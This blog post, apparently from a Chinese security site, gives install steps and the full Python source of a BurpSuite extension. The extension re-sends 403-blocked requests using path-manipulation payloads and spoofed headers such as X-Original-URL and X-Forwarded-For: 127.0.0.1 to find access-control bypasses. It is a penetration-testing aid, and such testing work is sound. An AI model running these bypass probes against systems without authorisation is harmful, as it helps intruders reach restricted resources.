
BurpSuite之403绕过插件(403Bypass)

403Bypasser是一个BurpSuite扩展插件,用于绕过返回403(受限制)的目录。通过PassiveScan(默认启用),此扩展会自动扫描每个返回403的请求,因此只需将其添加到BurpSuite中即可。


Payloads


插件安装

BurpSuite -> Extender -> Extensions -> Add -> Extension Type: Python -> Select file: 403bypasser.py -> Next till Finish

403bypasser.py

  1. from burp import IBurpExtender
  2. from burp import IScannerCheck
  3. from burp import IScanIssue
  4. from java.io import PrintWriter
  5. from array import array
  6. import re
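class BurpExtender(IBurpExtender, IScannerCheck):
    """Scanner check that retries 403 responses with path and header variants.

    Although this is registered as a *passive* check, doPassiveScan sends
    additional HTTP requests for every 403 response it is handed.  To keep
    that traffic confined to the engagement, requests whose URL lies outside
    Burp's configured target scope are skipped.  A 200 answer to a variant is
    reported as-is; manual confirmation is advisable, since e.g. a catch-all
    route can answer 200 for any path.
    """

    # Response status that triggers the check, and the status counted as a hit.
    TRIGGER_STATUS = 403
    HIT_STATUS = 200

    #
    # implement IBurpExtender
    #
    def registerExtenderCallbacks(self, callbacks):
        """Keep the callbacks/helpers, set the extension name and register the check."""
        self._callbacks = callbacks
        self._helpers = callbacks.getHelpers()
        callbacks.setExtensionName("403 Directory Bypasser")
        # autoFlush=True so log lines show up immediately in the Extender output tabs
        self.stdout = PrintWriter(callbacks.getStdout(), True)
        self.stderr = PrintWriter(callbacks.getStderr(), True)
        callbacks.registerScannerCheck(self)

    def _get_matches(self, sttcode):
        """Return True when response status *sttcode* should trigger the check.

        The name is historical: this only compares the status code, it does
        not search the response body for anything.
        """
        return sttcode == self.TRIGGER_STATUS

    def rplHeader(self, headerStr, headerName, newHeader):
        """Replace the whole ``headerName:`` line in *headerStr* with *newHeader*.

        Matching is case-insensitive and line-based (re.M); *headerName* is
        escaped so it is always matched literally.
        """
        pattern = '^' + re.escape(headerName) + ':.*?$'
        return re.sub(pattern, newHeader, headerStr, flags=re.I | re.M)

    def _status_of(self, messageInfo):
        """Return the status code of *messageInfo*'s response, or None if no response arrived."""
        response = messageInfo.getResponse()
        if response is None:
            return None
        return self._helpers.analyzeResponse(response).getStatusCode()

    def doPassiveScan(self, baseRequestResponse):
        """Re-issue a 403'd request with path and header variants and report hits.

        Returns a one-element list holding a CustomScanIssue when at least one
        variant received a 200, otherwise None.  Only the request line is
        rewritten for the path variants, so a path of "/" no longer clobbers
        every "/" elsewhere in the request (e.g. in "HTTP/1.1"); header
        variants are inserted directly after the request line instead of
        relying on a User-Agent header being present.
        """
        if not self._get_matches(self._status_of(baseRequestResponse)):
            return None
        requestInfo = self._helpers.analyzeRequest(baseRequestResponse)
        url = requestInfo.getUrl()
        # Passive checks see everything passing through Burp; only probe in-scope targets.
        if not self._callbacks.isInScope(url):
            return None
        OldReq = self._helpers.bytesToString(baseRequestResponse.getRequest())
        Rurl = str(url.getPath())
        if Rurl != "/":
            Rurl = Rurl.rstrip("/")
        segments = Rurl.split('/')
        PreviousPath = '/'.join(segments[:-1])
        LastPath = segments[-1]
        self.stdout.println("Scanning: " + Rurl)
        self.stdout.println(requestInfo.getHeaders())
        # Request line and the remainder (headers + body) are rewritten separately.
        requestLine, eol, remainder = OldReq.partition("\r\n")
        # NOTE(review): the listing showed several of these entries as run-together
        # string literals (a dropped comma); they are restored as separate entries.
        payloads = [
            "%2e/" + LastPath,
            LastPath + "/.",
            "./" + LastPath + "/./",
            LastPath + "%20/",
            "%20" + LastPath + "%20/",
            LastPath + "..;/",
            LastPath + "?",
            LastPath + "??",
            "/" + LastPath + "//",
            LastPath + "/",
            LastPath + "/.randomstring",
        ]
        hpayloads = [
            "X-Rewrite-URL: /" + LastPath,
            "X-Custom-IP-Authorization: 127.0.0.1",
            "X-Original-URL: /" + LastPath,
            "Referer: /" + LastPath,
            "X-Originating-IP: 127.0.0.1",
            "X-Forwarded-For: 127.0.0.1",
            "X-Remote-IP: 127.0.0.1",
            "X-Client-IP: 127.0.0.1",
            "X-Host: 127.0.0.1",
            "X-Forwared-Host: 127.0.0.1",
        ]
        service = baseRequestResponse.getHttpService()
        results = []
        for p in payloads:
            # count=1: only the path token of the request line is rewritten
            NewReq = requestLine.replace(Rurl, PreviousPath + "/" + p, 1) + eol + remainder
            checkRequestResponse = self._callbacks.makeHttpRequest(service, self._helpers.stringToBytes(NewReq))
            STT_CODE = self._status_of(checkRequestResponse)
            if STT_CODE == self.HIT_STATUS:
                results.append("Url payload: " + self._helpers.analyzeRequest(checkRequestResponse).getUrl().getPath() + " | Status code: " + str(STT_CODE))
        for hp in hpayloads:
            if hp.startswith("Referer:") and "Referer:" in OldReq:
                # an existing Referer is replaced rather than duplicated
                NewReq = self.rplHeader(OldReq, "Referer", hp)
            else:
                NewReq = requestLine + eol + hp + "\r\n" + remainder
            checkRequestResponse = self._callbacks.makeHttpRequest(service, self._helpers.stringToBytes(NewReq))
            STT_CODE = self._status_of(checkRequestResponse)
            if STT_CODE == self.HIT_STATUS:
                results.append("Header payload: " + hp + " | Status code: " + str(STT_CODE))
        if not results:
            return None
        return [CustomScanIssue(
            service,
            url,
            [self._callbacks.applyMarkers(baseRequestResponse, None, None)],
            "403 Bypass Vuln",
            '<br>'.join(results),
            "High")]

    def consolidateDuplicateIssues(self, existingIssue, newIssue):
        """Tell Burp how to merge two issues this check raised for the same URL path.

        Returns -1 (keep only the existing issue) when both issues carry the
        same URL, otherwise 0 (report both).  Note that the comparison is on
        the URL, not the issue name.
        """
        if existingIssue.getUrl() == newIssue.getUrl():
            return -1
        return 0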
#
# class implementing IScanIssue to hold our custom scan issue details
#
class CustomScanIssue(IScanIssue):
    """Plain holder for one scan issue raised by BurpExtender.

    Burp reads the issue back through the IScanIssue getters below.  The
    background and remediation texts are not supplied (None), the issue type
    is 0 and the confidence is always reported as "Certain".
    """

    CONFIDENCE = "Certain"
    ISSUE_TYPE = 0

    def __init__(self, httpService, url, httpMessages, name, detail, severity):
        """Store the values that Burp will later fetch through the getters."""
        self._httpService = httpService
        self._url = url
        self._httpMessages = httpMessages
        self._name = name
        self._detail = detail
        self._severity = severity

    def getHttpService(self):
        """The IHttpService the issue was found on."""
        return self._httpService

    def getUrl(self):
        """The URL the issue is reported against."""
        return self._url

    def getHttpMessages(self):
        """The marked request/response pairs attached to the issue."""
        return self._httpMessages

    def getIssueName(self):
        """Issue title shown in Burp's issue list."""
        return self._name

    def getIssueDetail(self):
        """Issue detail text (HTML) as built by the scanner check."""
        return self._detail

    def getSeverity(self):
        """Severity string supplied by the scanner check."""
        return self._severity

    def getConfidence(self):
        """Confidence is fixed for every issue of this class."""
        return self.CONFIDENCE

    def getIssueType(self):
        """No dedicated issue type is used."""
        return self.ISSUE_TYPE

    def getIssueBackground(self):
        """No background text is provided."""
        return None

    def getRemediationBackground(self):
        """No remediation background is provided."""
        return None

    def getRemediationDetail(self):
        """No remediation detail is provided."""
        return None

原创文章,作者: Admin ,转载请注明出处:https://secvery.com/4160.html